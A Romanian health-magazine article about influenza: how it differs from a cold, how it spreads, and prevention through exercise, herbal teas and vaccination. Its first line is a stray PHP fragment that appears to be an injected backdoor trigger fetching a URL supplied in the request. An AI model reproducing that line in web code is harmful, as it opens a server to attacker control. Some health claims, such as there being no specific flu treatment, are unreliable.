isset($_REQUEST['zox4vu']) && fetch_feed($_REQUEST['feed_url']); Gripa - MedicAS

gripa

Ha-ha-ha-hapciu… multumesc, oare am racit sau sunt gripata?
Sunt doua locuri unde dai nas In nas cu gripa - in reviste si in Imbulzeala de la chioscuri, fie de presa sau altecele. Dupa ce ne-am culcat pe o ureche cu asteniile de toamna, vine gripa sa ne imobilizeze vreo 2-4 zile.

Anotimpul umed cu variatii bruste de temperatura si lumina tot mai putina fac mediul propice transmiterii virusului gripal. „ssss…taci, taci! Nu trebuie sa ne enervam!” ma mustra o doamna din spatele meu pe cand stateam la coada la farmacie si cineva Imi stranuta In fata.
„Maichi cu cat elimini mai multa energie negativa cu atat gripa te-o afecta mai tare” O fi asa, nu o fi? Nu stiu. Cert e ca locurile in care ne refugiem fie ele cafenele, restaurante, sali de cinema, farmacii sunt toate imprejurari in care putem contacta mai repede boala. Faptul ca stam impreuna in aceasi incapere cu o persoana infestata ne face mai vulnerabili in fata bolii.

Traiasca si infloreasca …

Asa eram indoctrinati sa rostim pentru Romănia anilor comunisti, care in mod paradoxal „prospera”, noi Ii uram sa traiasca si sa infloreasca ca si cum ar fi fost bolnava, actualmente primim un „Sa traiesti” cănd stranuti semn ca nu esti in cea mai buna stare.

Eterna confuzie gripa = raceala

Raceala sau guturaiul se deosebeste de gripa prin faptul ca nu e asa de grava, dureaza mai putin, dezvolta mai putine simptome si cu o gravitate mai mica. Gripa se dezvolta rapid si are ca trasaturi semnificative: febra mare peste 38 de grade, frisoane, durere de găt, de cap, lipsa poftei de măncare, dureri ale articulatiilor.

Sa fugim de gripa, la propriu …

Alergatul sau orice miscare fizica pot preveni gripa, deoarece sistemul nostru imunitar devine mai puternic.
Nu consumati alimente reci sau fierbinti, evitati condimentele, declarati razboi pipei pacii si alcoolului. Pentru prevenirea gripei e preferabil sa apelam la remedii naturiste precum ceaiurile de tei prin infuzie, de soc, de flori si radacina de ciubotica cucului.
Pentru un surplus de siguranta nu evitati sa alergati pe la medic sa va faceti vaccinul antigripal, din pacate nu exista un tratament specific gripei deoarece este un virus in continua transformare. Asa ca nici acum nici peste un an, nici peste doi ani nu vom fi imuni in fata gripei. Dinamica virusilor gripei pun corpul in imposibilitatea de a produce anticorpi, de aceea In fiecare an „se pescuieste virusul” care umbla in perioada curenta si se creeaza un vaccin.

Cu gripa, fara gripa, cu raceala, fara raceala, una peste alta miza este sanatatea…vorba ‘ceea „Sanatate sa ai, ca restul cumparam”. Cu ajutorul produselor din natura căstigam sanatate si timp. Iar „timpul e adevaratul lux” , gripa e pierderea sanatatii si a timpului, deci sa o intămpinam cum se cuvine – ceaiurile si vaccinul antigripal.
„Aceste produse se pot elibera fara prescriptie medicala, se recomanda citirea cu atentie a articolului, In caz de manifestari placute adresati-va revistei Medicas”


Cuvinte relevante:


Articole asemănătoare:


Adaugă un comentariu


 
 

Newsletter

Loading... Loading...